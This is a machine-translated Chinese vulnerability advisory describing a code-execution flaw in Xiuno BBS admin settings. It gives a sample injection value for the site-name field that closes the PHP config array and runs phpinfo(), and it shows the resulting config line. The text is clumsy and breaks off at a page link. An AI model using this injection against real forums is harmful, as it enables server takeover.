xiuno bbs Forum background code execution Getshell vulnerabilities attached to the use of the method-vulnerability warning-the black bar safety net

2013-04-24T00:00:00
ID MYHACK58:62201338477
Type myhack58
Reporter 佚名
Modified 2013-04-24T00:00:00

Description

Official description:

Xiuno the name comes from the Saint Seiya Aries gold Saint Seiya Shura, his attack speed and combat effectiveness is zodiac the strongest, he is the speed and power of the incarnation; in the Buddhist inside, Shura is a six Channel One, in the humanity and heaven, between, together, the half-human, half-God, temperament staunch, militant fight. We take its meaning, hope XIUNO become increasingly strong, increasingly fast.

In Xiuno BBS the first line of code start with a total of about 4W more lines of code, which took many years of performance Quest on to the harsh, perfect, hysterical, neurotic, and the author himself often because the trade-offs of a scheme and fall into a meditative state, in the tens of millions-level data, end of program execution speed basic control in 0. 00x seconds, is the author himself quite satisfied.

Vulnerability description:

xiuno background in written to the configuration file occurs when the vulnerability leads to code execution

1. The system configuration is not stored in the database, but stored in the conf. php;

2. Use the array method to store;

3. Have escape: ‘ =>\’ ;

4. The ‘\’without escaping;

5. Insert the\’will be escaped as\\’, php represents one\, and single quotes is to escape the escape, and therefore can be closed in front of the array;

6. The vulnerability is in the background in the management of multiple occurrences, including lights Heron plugin settings also appear.

In admin/control/conf_control. class. php on_base method:

The relevant code omitted。。。。

Written directly to the file, since the filter is not strict, we use’to bypass single quotes are filtered, and reaches the closed single quotation purposes.

Settings -> Basic Settings -> site name plus \’,)&&phpinfo();/* (other place should also be, didn't test)

!

This in conf/conf. php write the following code:

return array (...... // Unique identification ID 'app_id' => 'bbs' , // site name 'app_name' => 'Xiuno BBS\\' ,)&&phpinfo();/*',

[1] [2] next